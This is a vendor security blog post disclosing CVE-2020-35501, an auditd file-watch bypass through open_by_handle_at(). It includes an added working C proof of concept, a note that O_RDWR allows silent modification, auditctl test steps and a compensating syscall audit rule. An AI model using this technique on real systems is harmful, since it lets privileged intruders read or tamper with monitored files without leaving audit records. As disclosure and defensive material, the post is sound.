Cyber defense expert discovers vulnerability in Linux audit framework

To support our customers with technical expertise and the latest industry knowledge, our cyber defense experts address fundamental questions and undergo mandatory training on a broad variety of products.

It was in carrying out this kind of fundamental research, in this case on the Linux audit framework (auditd), that we discovered a significant vulnerability.

After a thorough evaluation, we determined that file monitoring can be circumvented by a sufficiently privileged process. Specifically, the process must hold the CAP_DAC_READ_SEARCH capability, which the "root" administrator account normally has. Under these conditions, the process can open files with the open_by_handle_at() syscall and read and modify them at will without generating an entry in the auditd log. The reason is that audit file watches (rules of the form -w /path) are evaluated during path lookup, whereas open_by_handle_at() resolves a previously obtained file handle directly to the inode without any path lookup, so the watch is never consulted. We verified that this vulnerability can be exploited on CentOS 7, CentOS 8 and Ubuntu 16.04.
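The following C program is an added example, not code from the original article or from Red Hat. It exercises the two-step path described above against a throwaway file it creates itself: it asks the kernel for the file's opaque handle, then opens the file through that handle and reads it back, never opening it by name. It assumes Linux with glibc; the names raw_handle, read_via_handle, run_demo and the sample content are this example's own.

```c
/* Added example, not code from the original article: exercise the
 * open_by_handle_at() path described above against a throwaway file it
 * creates itself.  Assumes Linux/glibc; helper names are this example's own. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Same layout as the kernel's struct file_handle, with the flexible array
 * sized to MAX_HANDLE_SZ (128), so the glibc wrappers are not required. */
struct raw_handle {
    unsigned int handle_bytes;    /* in: capacity of f_handle; out: bytes used */
    int handle_type;              /* filesystem-specific handle type */
    unsigned char f_handle[128];
};

enum bypass_status {
    BYPASS_OPENED = 0,        /* opened by handle: no path walk, no -w record */
    BYPASS_NO_HANDLE = 1,     /* name_to_handle_at failed (ENOENT, EOPNOTSUPP) */
    BYPASS_NO_PRIVILEGE = 2,  /* EPERM: no CAP_DAC_READ_SEARCH (or seccomp) */
    BYPASS_OTHER_ERROR = 3
};

/* Constructed sample content; run_demo creates and removes the file itself. */
static const char SAMPLE_CONTENT[] = "constructed sample, not a real secret\n";

/* Read up to n-1 bytes of `path` without ever opening it by name.  `dir` must
 * be a directory on the same mount (the parent is the natural choice); it only
 * tells the kernel which filesystem the handle belongs to. */
enum bypass_status read_via_handle(const char *dir, const char *path,
                                   char *buf, size_t n)
{
    struct raw_handle fh;
    int mount_id, mount_fd, fd, saved;
    ssize_t got;

    /* Step 1: name -> opaque handle.  Needs no privilege, but it still walks
     * the path, so this step on its own is not silent. */
    fh.handle_bytes = sizeof fh.f_handle;
    if (syscall(SYS_name_to_handle_at, AT_FDCWD, path, &fh, &mount_id, 0) == -1)
        return BYPASS_NO_HANDLE;

    mount_fd = open(dir, O_RDONLY);
    if (mount_fd == -1)
        return BYPASS_OTHER_ERROR;

    /* Step 2: handle -> open file.  The kernel maps the handle straight to the
     * inode; no path lookup runs, so a path watch (-w) is never evaluated. */
    fd = (int)syscall(SYS_open_by_handle_at, mount_fd, &fh, O_RDONLY);
    saved = errno;
    close(mount_fd);
    errno = saved;
    if (fd == -1)
        return errno == EPERM ? BYPASS_NO_PRIVILEGE : BYPASS_OTHER_ERROR;

    got = read(fd, buf, n - 1);
    close(fd);
    if (got < 0)
        return BYPASS_OTHER_ERROR;
    buf[got] = '\0';
    return BYPASS_OPENED;
}

/* Create a throwaway file in `dir`, read it through its handle, remove it and
 * report the outcome; errno from the failing step is preserved. */
enum bypass_status run_demo(const char *dir, char *out, size_t n)
{
    char path[512];
    int fd, saved;
    ssize_t wrote;
    enum bypass_status st = BYPASS_OTHER_ERROR;
    snprintf(path, sizeof path, "%s/cve-2020-35501-demo.%ld", dir, (long)getpid());
    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd == -1)
        return st;
    wrote = write(fd, SAMPLE_CONTENT, sizeof SAMPLE_CONTENT - 1);
    close(fd);
    if (wrote == (ssize_t)(sizeof SAMPLE_CONTENT - 1))
        st = read_via_handle(dir, path, out, n);
    saved = errno;
    unlink(path);
    errno = saved;
    return st;
}

int main(void)
{
    char out[128];
    enum bypass_status st = run_demo("/tmp", out, sizeof out);
    if (st == BYPASS_OPENED)
        printf("opened by handle without a path walk, read: %s", out);
    else
        printf("status %d: %s\n", (int)st, strerror(errno));
    return 0;
}
```

Run as an unprivileged user, the second step fails with EPERM, which is the CAP_DAC_READ_SEARCH requirement stated above; run as root on a default install it succeeds. Opening with O_RDWR instead of O_RDONLY works the same way and is how the modification described above is carried out. To observe the gap against a live auditd, put a watch on a test file with auditctl (for example -w /path/to/file -p rwa -k demo), run the program against that file and search with ausearch -k demo: the handle-based open and the subsequent reads produce no record for the watch, while a syscall rule such as -a always,exit -F arch=b64 -S open_by_handle_at -k handle_open does record the call itself and is the obvious compensating control until the kernel is fixed.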

The vulnerability was reported to the vendor, Red Hat, Inc., in mid-November 2020. In accordance with standard disclosure practice, we gave the vendor 90 days to rectify the vulnerability. The problem has been published under the reference CVE-2020-35501.

To keep our customers secure, our employees are deeply involved in the technical aspects of all processes. It is testament to the conscientiousness of our cyber defense experts that they managed to find this vulnerability.

Please feel free to contact us for more information about the discovery of the vulnerability and possible countermeasures.